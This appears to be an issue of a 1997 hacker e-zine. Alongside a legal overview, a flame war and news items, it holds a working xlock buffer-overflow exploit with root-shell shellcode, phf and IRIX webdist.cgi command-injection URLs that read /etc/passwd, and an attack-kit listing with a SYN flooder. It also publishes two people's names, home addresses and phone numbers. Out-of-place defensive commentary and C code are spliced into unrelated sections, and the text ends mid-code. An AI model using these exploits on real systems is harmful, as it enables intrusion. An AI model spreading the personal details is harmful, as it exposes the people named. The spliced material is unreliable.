  to retrieve or read then you are committing an offence, this only applies if
  the person in question has intent ( meaning they are doing it on purpose,
  often referred to as hacking ) to carry this out. }

A person is guilty of an Offence if the access he intends to secure is
unauthorised; and he knows at the time when he causes the computer to perform
the function that that is the case.

{ This means that if the person doesn't have authorisation to secure access to
  files then he is committing an offence. The person is not guilty if he/she
  doesn't know what they are trying to perform. This applies to everything
  i.e. any program, a program or data of any particular kind and a program or
  data held }

A person guilty of an offence under this section shall be liable on summary
conviction to imprisonment for a term not exceeding six months or to a fine
not exceeding level 5 on the standard scale or to both.

{ Meaning, you could go to prison for 6 months for committing an offence
  mentioned above ! You could also be subject to a fine @ level 5, which is
  always changing. You have to be convicted of the crime first though ;) }

SECTION 2 Unauthorised access with intent to commit or facilitate
-----------------------------------------------------------------
commission of further offences
------------------------------

A person is guilty of an offence under this section if he commits an offence
under section 1 above. To commit an offence to which this section applies or
to facilitate the commission of such an offence ( whether by himself or by any
other person) and the offence he intends to commit or facilitate is referred
to below in this section as the further offence.
{ This meaning that what is mentioned in section 2 applies to the person
  gaining unauthorised access to a computer system and to anyone who
  facilitates such a person }

This section applies to offences for which a person of twenty-one years of age
or over ( not previously convicted ) may be sentenced to imprisonment for a
term of five years.

{ This means that if you re-offend or facilitate to re-offend and have been
  convicted you are liable to 5 years imprisonment and/or a large fine }

SECTION 3 Unauthorised modification of computer material
--------------------------------------------------------

A person is guilty of an offence if he/she does any act that causes an
unauthorised modification of the contents of any computer; and at the time
when he does the act he has the requisite intent and the requisite knowledge.

{ This means that if a person modifies computer material which he/she is not
  authorised to do he/she is guilty of committing an offence, however, the
  person must have the intent to carry out this crime else the person is not
  liable }

{ This next bit is the interesting bit }

For the purposes of the above section the requisite knowledge is an intent to
cause a modification of the contents of any computer and by so doing to impair
the operation of any computer; to prevent or hinder access to any program or
data held in any computer; to impair the operation of any such program or the
reliability of any such data. The intent need not be directed at any particular
computer; any particular program or data or a program or data of any particular
kind; or any particular modification.

{ This basically means, if you have the intent and knowledge of breaking into
  computers, without having to actually do it you can be liable to an offence.
}

For the purposes of the Criminal Damage Act 1971 a modification of the contents
of a computer shall not be regarded as damaging any computer or computer
storage medium unless its effect on that computer storage medium, impairs its
physical condition.

{ Meaning that you cannot be prosecuted for criminal damage whilst hacking into
  a machine unless you cause physical damage i.e. on site hacking, then taking
  a sledge hammer to the computer can be classed as criminal damage but
  changing the password for root login is not criminal damage, unless you send
  the computer into high speed self destruct mode and ruin one of the heads on
  the 50 gig juke box ? }

{ A lot of the next part of the document is about jurisdiction and some
  technical mumbo jumbo }

SECTION 14 Search warrants for offences under section 1
-------------------------------------------------------

Where a circuit judge is satisfied by information on oath given by a constable
that there are reasonable grounds for believing that an offence under section
1 above has been or is about to be committed in any premises; and that evidence
that such an offence has been or is about to be committed is in those premises
he/she may issue a warrant authorising a constable to enter and search the
premises, using such reasonable force as is necessary.

{ This basically means that if they believe that you have the intent or have
  broken into a system you're not supposed to ( section 1 ) they can come
  around your house and knock your door in, or, open it for them nicely. }

SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies
---------------------------------------------------------------------------

The offences to which an order in council under section 2 of the extradition
act 1870 can apply shall include offences under sections 2 and 3 and any
conspiracy to commit such an offence and any attempt to commit an offence
under section 3.
{ This meaning, that if you have a conspiracy to break into a system you can be
  extradited }

In the UK it can be illegal to possess anything which may show an intent to
hack, such as hacking documents. So, if you're out there and in the UK and
didn't know that what you were doing is most probably illegal then keep your
head down !

6. so1o Gets Busted By CERT : so1o

I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken
pussy! and a cl000less one at that!@# Spreadin' shit about stuff you dont know :

[20:57] dude!! wassup?
[20:59] so1o got busted by CERT! lol
[21:00] yup
[21:00] they have logs of him on over 80 computers
[21:01] thats all i know is like what i just got forwarded to me
[21:03] they got logs from when he used phfscan.c
[21:03] and other shit any more info on so1o shit ?
[21:06] l
[21:06] Dear Sir.
[21:06] We have now traced down the responsible account behind this attempt and
[21:06] have taken action against it.
[21:06] If you would like to know who is behind this you should either file a
[21:06] report to the proper authorities or fax pege Gustagsson at +++ 46 8
[21:06] 7132657 and ask him to trace this down in the phone network.
[21:06] If you got any more questions feel free to get back to me.. or if you
[21:06] think that this is to be considered as closed.
[21:06] check this now
[21:06]  __ ____   Telia Internet
[21:06] / /_/ /    Incident Response Team
[21:06] / / \ /    IRT@TELIA.NET
[21:06]            FAX ++46 - 8 456 8935
[21:06] On Fri, 2 May 1997, m0dify wrote:
[21:06] > That is the log from our www.usda.gov web server.... CERT also said that
[21:06] > this log is on 80 computers since 4/1/97 . There was also a log on
[21:06] > the 17th of April.
[21:07] > > Dear Sir.
[21:08] > > This messages dropped down on my desk today.
[21:08] > > I need a time to know who was on that dial up and so whe could hunt
[21:08] > > him/her down in the phone network..
[21:08] heh... so1o fuct up it seems.. he's toast.
[21:10] im glad to man...
amnesty was just so uncool when he did that

h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#

I've seen one of those logs that Modify had (now CERT have them too) and, I'm
sooooo disappointed to say...

-I- -D-I-D-N-'-T -P-H-F- -T-H-O-S-E- S-I-T-E-S-

Let us look at the facts...Those that Hostile and his little lameassfuck sIn
wannabe haqr posse didn't even see :

-------------------------------------------------------------------------------
THE FACTS :
-------------------------------------------------------------------------------

CERT logs show that the phf queries to approximately 80 sites on the same day
that the www.amnesty.org page was changed show that this technique was
used..which is fundamentally incorrect, here is the phf query string found in
the logs, the fact that this was on the same day as amnesty is the ONLY factor
linking me to these events :

GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd

(I think there's also a "3D" somewhere in there too..)
And here is the phf query code set down by every text I have ever read AND in
phfscan.c which I would use if I ever wanted to scan such sites for the phf
hole :

GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

I think we can all see a slight difference, which basically says "IT'S NOT MY
FUCKING STYLE! ONLY A LUNA-FUCKING-TICK would even think about using that
technique. Seeing it probably wouldn't work anyway."

The next point is the IP from where the queries originate, it is *.telia.com
which I have been told is a SWEDISH ISP now, do I live in Sweden? NO!! Do I
have any shells at dynamic IP's IN SWEDEN? NO!! There is no plausible way I
could have run such a scan. Unless I dial long distance, which isn't gonna
happen.

One last point, I knew that we "0wned" amnesty.org from about 2 weeks before
we actually decided to change the index.html, because when my friends broke in
the first time, they had set up a .rhosts file and a suid root shell in
something like /tmp/.... But when they left the system and tried to regain
access, they found that the admin had removed the account or changed the login
and pass, so we decided to leave the site for about a week and a half, until
we started to try and formulate a way to get back in, in this period we did NO
phf scanning whatsoever. And on the weekend when we did get back in, using an
ingenious method that I was never told about, by a new hacker to our team,
modeX, we decided to at least do something to prove we had regained access, so
I designed a new index.html, to which the team uploaded. That was all that
happened, and therefore the phf scans can IN NO WAY be related to the
amnesty.org attack as we owned that system A LONG TIME before, and it was only
a matter of regaining access, one last point being that we didn't walk through
the amnesty "front door" as it were, as I was told we stumbled over a trusted
host, shell.oil.ca or something like that.
Anyway, that's just a few points I would like to raise in proving that sIn are
again VERY CL000LESS fucks who know absolutely NOTHING about hacking or "the
scene" in any way shape or form...And as for the Incident Response Team, they
are most probably looking for some lamefuck Swedish haqr. Any-Fucking-Way, what
the fuck they gonna do when they find this haqr?!@ arrest him for phf'ing 80
sites? h0h0h0, I wouldn't call that much of a bust :)

"Listen sonny! you're gonna get 10 years for connecting to port 80 and typing
"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd" because that's not
against ANY law and CERT owns us all.

so1o.

There are a lot of missing pieces, and a lot of the data I base my argument on
originated from m0dify (see the letter to IRT@TELIA.NET earlier) so I think I
have more of an idea than Hostile the cl00less lame gimpfuck wannabe haqr.

7. CERT Advisory CA-97.13 : xlock vulnerability : Taken From Bugtraq

Topic: Vulnerability in xlock
-------------------------------------------------------------------------------

The CERT Coordination Center has received reports that a buffer overflow
condition exists in some implementations of xlock. This vulnerability makes it
possible for local users (users with access to an account on the system) to
execute arbitrary programs as a privileged user.

Exploitation information involving this vulnerability has been made publicly
available.

If your system is vulnerable, the CERT/CC team recommends installing a patch
from your vendor. If you are not certain whether your system is vulnerable or
if you know that your system is vulnerable and you cannot add a patch
immediately, we urge you to apply the workaround described in Section III.B.

We will update this advisory as we receive additional information. Please
check our advisory files regularly for updates that relate to your site.

-------------------------------------------------------------------------------

I.
Description

   xlock is a program that allows a user to "lock" an X terminal. A buffer
   overflow condition exists in some implementations of xlock. It is possible
   to attain unauthorized access to a system by engineering a particular
   environment and calling a vulnerable version of xlock that has setuid or
   setgid bits set.

   Information about vulnerable versions must be obtained from vendors. Some
   vendor information can be found in Appendix A of this advisory.

   Exploitation information involving this vulnerability has been made
   publicly available.

   Note that this problem is different from that discussed in CERT Advisory
   CA-97.11.libXt.

II.  Impact

   Local users are able to execute arbitrary programs as a privileged user
   without authorization.

III. Solution

   Install a patch from your vendor as described in Solution A. If you are not
   certain whether your system is vulnerable or if you know that your system
   is vulnerable and you cannot install a patch immediately, we recommend
   Solution B.

   A. Obtain and install a patch for this problem.

      Below is a list of vendors who have provided information about xlock.
      Details are in Appendix A of this advisory; we will update the appendix
      as we receive more information. If your vendor's name is not on this
      list, the CERT/CC did not hear from that vendor. Please contact your
      vendor directly.

           Berkeley Software Design, Inc. (BSDI)
           Cray Research - A Silicon Graphics Company
           Data General Corporation
           Digital Equipment Corporation
           FreeBSD, Inc.
           Hewlett-Packard Company
           IBM Corporation
           LINUX
           NEC Corporation
           The Open Group [This group distributes the publicly available
                           software that was formerly distributed by
                           X Consortium]
           Solbourne
           Sun Microsystems, Inc.

   B. We recommend the following workaround if you are not certain whether
      your system is vulnerable or if you know that your system is vulnerable
      and you cannot install a patch immediately.

      1. Find and disable any copies of xlock that exist on your system and
         that have the setuid or setgid bits set.

      2.
Install a version of xlock known to be immune to this vulnerability. One
         such supported tool is xlockmore. The latest version of this tool is
         4.02, and you should ensure that this is the version you are using.
         This utility can be obtained from the following site:

         ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz

         MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e

         You can also obtain this version from mirror sites. A list of these
         sites will be displayed if you are not able to access the above
         archive due to load.

...........................................................................

Appendix A - Vendor Information

Below is a list of the vendors who have provided information for this
advisory. We will update this appendix as we receive additional information.
If you do not see your vendor's name, the CERT/CC did not hear from that
vendor. Please contact the vendor directly.

Berkeley Software Design, Inc. (BSDI)
=====================================
  BSD/OS is not vulnerable to the problem in xlock since our xlock is not
  setuid.

Cray Research - A Silicon Graphics Company
==========================================
  Cray Research does not include xlock in its X Window releases, so we are
  not at risk on the xlock buffer overflow problem.

Data General Corporation
========================
  The xlock sources (xlockmore-3.7) that DG includes in its contributed
  software package have been modified to remove this vulnerability. These
  will be available when release 8 comes out. We also recommend that our
  customers who have the current version should change the sprintf calls in
  resource.c to snprintf calls, rebuild and reinstall the package.

Digital Equipment Corporation
=============================
  This reported problem is not present for Digital's ULTRIX or Digital UNIX
  Operating Systems Software.

FreeBSD, Inc.
=============
  The xlockmore version we ship in our ports collection is vulnerable in all
  shipped releases. The port in FreeBSD-current is fixed.
  Solution is to install the latest xlockmore version (4.02).

Hewlett-Packard Company
=======================
  We ship an suid root program vuelock that is based on xlock. It does have
  the vulnerability. The only workaround is to remove the executable, the
  patch is "in process".

IBM Corporation
===============
  AIX is vulnerable to the conditions described in this advisory. The
  following APARs will be released soon:

     AIX 3.2: APAR IX68189
     AIX 4.1: APAR IX68190
     AIX 4.2: APAR IX68191

  IBM and AIX are registered trademarks of International Business Machines
  Corporation.

LINUX
=====
  Red Hat:  Not vulnerable
  Caldera:  Not vulnerable
  Debian:   An updated package is on the Debian site
  SuSE:     ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock

  And in general the new Xlockmore release fixes the problems.

NEC Corporation
===============
  UX/4800             Not vulnerable for all versions.
  EWS-UX/V(Rel4.2MP)  Not vulnerable for all versions.
  EWS-UX/V(Rel4.2)    Not vulnerable for all versions.
  UP-UX/V(Rel4.2MP)   Not vulnerable for all versions.

The Open Group
==============
  Publicly available software that was formerly distributed by the
  X Consortium - Not vulnerable.

Solbourne
=========
  Solbourne is not vulnerable to this attack.

Sun Microsystems, Inc.
======================
  We are producing patches for OpenWindows 3.0 for Sun OS versions 4.1.3_U1,
  4.1.4, 5.3, 5.4, 5.5, and 5.5.1.

-------------------------------------------------------------------------------

The CERT Coordination Center thanks David Hedley for reporting the original
problem and Kaleb Keithley at The Open Group for his support in the
development of this advisory.

-------------------------------------------------------------------------------

If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (see http://www.first.org/team-info/).
CERT/CC Contact Information
------------------------------

Email    cert@cert.org

Phone    +1 412-268-7090 (24-hour hotline)
         CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
         and are on call for emergencies during other hours.

Fax      +1 412-268-6989

Postal address
         CERT Coordination Center
         Software Engineering Institute
         Carnegie Mellon University
         Pittsburgh PA 15213-3890
         USA

Using encryption

   We strongly urge you to encrypt sensitive information sent by email. We
   can support a shared DES key or PGP. Contact the CERT/CC for more
   information.

   Location of CERT PGP key
         ftp://info.cert.org/pub/CERT_PGP.key

Getting security information

   CERT publications and other security information are available from
         http://www.cert.org/
         ftp://info.cert.org/pub/

   CERT advisories and bulletins are also posted on the USENET newsgroup
         comp.security.announce

   To be added to our mailing list for advisories and bulletins, send email to
         cert-advisory-request@cert.org
   In the subject line, type
         SUBSCRIBE your-email-address

-------------------------------------------------------------------------------

* Registered U.S. Patent and Trademark Office.

Copyright 1997 Carnegie Mellon University
This material may be reproduced and distributed without permission provided it
is used for noncommercial purposes and the copyright statement is included.

The CERT Coordination Center is part of the Software Engineering Institute
(SEI). The SEI is sponsored by the U.S. Department of Defense.
-------------------------------------------------------------------------------
This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock
           http://www.cert.org
               click on "CERT Advisories"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Revision history

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B
pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu
JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze
kGKLcu0+LzE=
=nF5B
-----END PGP SIGNATURE-----

------------------------------------------------------------------------------
The Exploit Code - not in the *ORIGINAL* CERT advisory ;] :
------------------------------------------------------------------------------

/*
 * x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97
 * Original exploit framework - lpr exploit
 *
 * Usage: make xlock-exploit
 *        xlock-exploit
 *
 * Assumptions: xlock is suid root, and installed in /usr/X11/bin
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996

long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(int argc, char *argv[])
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int dfltOFFSET = DEFAULT_OFFSET;
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    int i;

    if (argc > 1)
        dfltOFFSET = atoi(argv[1]);
    else
        printf("You can specify another offset as a parameter if you need...\n");

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }

    ptr = buff;
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + dfltOFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;
    execl("/usr/X11/bin/xlock", "xlock",
          "-nolock", "-name", buff, NULL);
}

8. IRiX WWW Server Bugs : Tetsu Khan

Number 1 :
----------

http://www.site.com/cgi-bin/wrap?/etc

...Lets you view the contents of the /etc/ directory, you can try others too..

Number 2 :
----------

http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the cgi
script isn't a trap. You can also execute some kind of remote shell using the
webdist technique, but we are looking into it now...

9. Hacking Not-So-Electrical Items : Tetsu Khan

y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r.... TrEES!!!

tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!! TrEES!!! tReEs!!! TrEEs!!!

YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!!

oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd...

1 : A HaCk SaW
2 : CoMoFlAgUeD CLoThiNG
3 : a CoPPeR NaiL
4 : A hAmmER
5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte)
6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE
7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*)
8 : OnE RS232 CaBlE

OkAy CrEw! ThIs iS Da mAsTA PlAn!@#

FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE,
dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE
BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy
aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To
PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE!

WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe
BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute
d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS
AnD RuN tHiS PrOgRam In Gw-BASiC...
10 OPEN (COM PORT AND STUFF) 20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00" 30 OPEN (ANOTHER PORT AND STUFF) 40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS" 50 GOTO 10 ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt. NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB HaRd dRivE SPaCe) hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&* TeEkAy. =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. Amnesty International Hacked : Article From cnet.com http://www.news.com/News/Item/0,4,10135,00.html Amnesty International hacked By Janet Kornblum April 28, 1997, 3:15 p.m. PT Hackers broke into the Amnesty International home page over the weekend, altering it with a highly stylized, futuristic-looking graphic of a small child or baby smoking a cigarette. Amnesty International didn't know what the perpetrators wanted to accomplish with the hacking, which was strikingly apolitical considering the political nature of the target. Above the picture, the altered Web page read, "Who laughs last? We are the 4 man dream team, just proving one of many points." But just what those points were was lost on many, not the least of whom was Mike Blackstock, the system administrator for Ontario Internet Link, the small Canadian Internet service provider that hosts the Amnesty site for free. "As far as I can tell, they didn't do anything malicious," he said. "They replaced one page of Amnesty with a silly graphic of a kid smoking. 
This was not political as far as I could tell. The only politics I could think of was cigarettes." Beneath the picture, the page is signed, "Thanx to: so1o, modeX, XFli, mstrhelix...CodeZero uber alles!" This hack appears to be unrelated to other recent high-profile incidents, including one last week in which a Portuguese group broke in to Indonesian government Web pages to protest its treatment of East Timor. In that case, the hackers--referred to by many as "crackers" because they crack into systems--were quite clear about the reasons behind their action. In the case of the Amnesty page, Blackstone said the hackers only altered the Web page and did not cause major damage, though they could have done so if they wanted to. The altered page was up for a few hours, he said. Blackstone was busy plugging the security hole but pointed out that sites much bigger with higher profiles, such as the Air Force, the Central Intelligence Agency, and the Justice Department, also have been hacked. 2. //sToRm// Of sIn Rips Port Pro : so1o Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book, which include... DrSpewfy : Pile'O'Crap, why not get a nameserver and sirc? and actually be able to talk to people? DCCNewk : Chargen Flood? why not try like, SYN FLOOD? d0h.. Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte Software, and it is SOOO obvious that //sToRm// just did a little bit of hex editing, and B00oo00m! hes changed the authors name and shit to his own! but ummm, because of his EXTREME lameness, he didn't know how to change the program name, the version and the general interface and look of the program, what a LAME FUCK. I'm sure he will have Blue Byte on his fucking ass with Copyright and shit. 
h0h0h0h0h0!@# I doubt //sToRm// coded *ANYTHING* on that page, as DrSpewfy is just shit, and DCCNewk is just like the DCC Nuking code we put out in the CodeZero Technical Journal Issue 2 :) 3. Digital Darkness Lives : so1o It looked as if the DD wouldn't bring out a magazine this month, but they got a huge influx of submissions and live another day!@# if you want to submit anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure. Visit their page too : http://dd.home.ml.org 4. /home/sdr 0wned : so1o sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on efnet have their shells) was playing with the permissions in his home directory and he accidentally made the whole directory world readable, so then cold blood and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and were distributing the sdr.tar.gz in #hack using XDCC :) 5. Sendmail 8.8.4 Remote Is Out : so1o Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now out, there was some delay in r00t members getting the offsets needed for each Operating System, but now the technique is complete, and many 8.8.4 systems are vunerable. Sendmail 8.8.5 remote exploits are being looked into now. 6. sIn inf0z Part 2 : The CodeZero ------------------------------------------------------------------------------- =-= w0wie!@# we g0t 2 n0w!! =-= ------------------------------------------------------------------------------- Alias : Evil Chick Real Name : Suzette Kimminau Address : 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Telephone : (206)454-7176 Email : evilchic@NWLINK.COM ------------------------------------------------------------------------------- Alias : \\StOrM\\ Real Name : Jason Sloderbeck Address : 5739 N Norton, Kansas City, MO 64119 USA Telephone : (816)453-8722 Email : storm@SINNERZ.COM ------------------------------------------------------------------------------- aS wE PrOMiSeD LasT t1me! eXpect m0re s00n! 
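The xlock exploit above, and the crontab and imapd exploits further down in issue 3, all depend on a fixed buffer being filled from an untrusted string; the Solaris ps exploit further down depends on a setuid program honouring NLSPATH from the caller's environment. As an added defensive example, not code from the zine or from any of the exploit authors, the C below shows the two checks a privileged program should apply first: a length-checked copy that rejects oversized input instead of writing past the buffer, and a scrub of attacker-controlled environment variables before any locale, library or shell code runs. NAME_MAX_LEN, the variable list and the sample inputs are constructed for illustration.

```c
/*
 * Added defensive example, not code from the zine or from any exploit author.
 * The xlock, crontab and imapd exploits in this file fill a fixed buffer
 * from an untrusted string; the Solaris ps exploit makes a setuid program
 * load a message catalogue named by the caller's NLSPATH. A privileged
 * program should apply both checks below before it does anything else.
 * NAME_MAX_LEN, the variable list and the sample inputs are constructed.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX_LEN 64   /* constructed: size of the fixed buffer a name is copied into */

/* Vulnerable pattern, shown as a comment only:
 *     char name[NAME_MAX_LEN]; strcpy(name, argv[i]);
 * writes past the end of name as soon as the argument is 64 bytes or longer.
 * Replacement: look for the terminator within dst_size bytes first, and reject
 * (rather than silently truncate) anything that does not fit.
 * Returns 0 on success, -1 when src would not fit. */
int copy_name_checked(char *dst, size_t dst_size, const char *src)
{
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)                       /* no terminator within the budget */
        return -1;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Environment entries a setuid program must not take from its caller.
 * NLSPATH is what the ps exploit in this file abuses; the LD_ family steers
 * the dynamic linker; IFS changes how any shell it spawns splits words.
 * Illustrative list, not exhaustive. */
static const char *const dangerous_prefixes[] = {
    "NLSPATH=", "LOCPATH=", "LD_", "IFS=", NULL
};

/* Drop matching entries from a NULL-terminated envp array in place and
 * return how many were removed. Call this (or build a fresh minimal
 * environment) before any locale, library or shell code runs. */
int scrub_environment(char **envp)
{
    int removed = 0;
    char **out = envp;
    for (char **in = envp; *in != NULL; in++) {
        int drop = 0;
        for (int i = 0; dangerous_prefixes[i] != NULL; i++) {
            size_t plen = strlen(dangerous_prefixes[i]);
            if (strncmp(*in, dangerous_prefixes[i], plen) == 0) {
                drop = 1;
                break;
            }
        }
        if (drop)
            removed++;
        else
            *out++ = *in;
    }
    *out = NULL;
    return removed;
}

int main(void)
{
    char name[NAME_MAX_LEN];
    char longarg[2000];                      /* constructed oversized argument */
    char *env[] = { "HOME=/home/user", "NLSPATH=/tmp/foo",
                    "LD_PRELOAD=/tmp/evil.so", "PATH=/usr/bin", NULL };

    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';

    printf("name \"xlock\": %s\n",
           copy_name_checked(name, sizeof name, "xlock") == 0 ? "accepted" : "rejected");
    printf("2000-byte name: %s\n",
           copy_name_checked(name, sizeof name, longarg) == 0 ? "accepted" : "rejected");

    printf("removed %d environment entries; kept:\n", scrub_environment(env));
    for (char **e = env; *e != NULL; e++)
        printf("  %s\n", *e);
    return 0;
}
```

The copy routine rejects rather than truncates because a silently shortened display name or filename still reaches the rest of the program and can mask a probe; an error message is the better failure. The environment scrub is a floor, not the whole fix: the ps hole was closed by the vendor patch, and a setuid program that has to read a catalogue or library should take the path from a compiled-in default, not from any environment variable.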
=============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/05/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the file, then move the files around and shit if you want to, then you're ready to go! Expect OS specific kits in later issues...And Multi-Scan s00n. =============================================================================== The Contents Of The Kit : =============================================================================== dnsscan : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com. phpscan : Scans hosts from a file and outputs a list of php vunerable sites. phpget : Gets files from php vunerable servers. phfscan : Scans hosts from a file and outputs a list of php vunerable sites. ident-scan: Scans all daemons running on ports and determines cool stuff. tcpprobe : Very simple portscanner. fingah : Uses an apache hole to finger systems if port 79 isnt open. synk4 : SYN flooder, basically kicks the shit out of systems. 
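The IRiX webdist.cgi and wrap bugs above, the handler hole in issue 3 below, and the phf hole that phfscan in this kit looks for, share one cause: a URL parameter reaches a shell without validation. As an added example that is not part of the zine or of CRAK, the C below shows the server-side fix (an allowlist check on the parameter before it is used in any command) and a log check a defender can run over an access log to flag such requests, percent-decoding the request target first so an encoded space or newline is seen for what it is. The log lines, addresses and allowlist are constructed for illustration; the request strings in them are the ones quoted in this file.

```c
/*
 * Added defensive example, not code from the zine or from CRAK.
 * The webdist.cgi, wrap and handler bugs in this file (and the phf hole
 * phfscan looks for) share one cause: a URL parameter reached a shell
 * without validation. Shown here: an allowlist check for the parameter,
 * and a log check that flags requests carrying shell metacharacters
 * after percent-decoding. Log lines, addresses and allowlist are constructed.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

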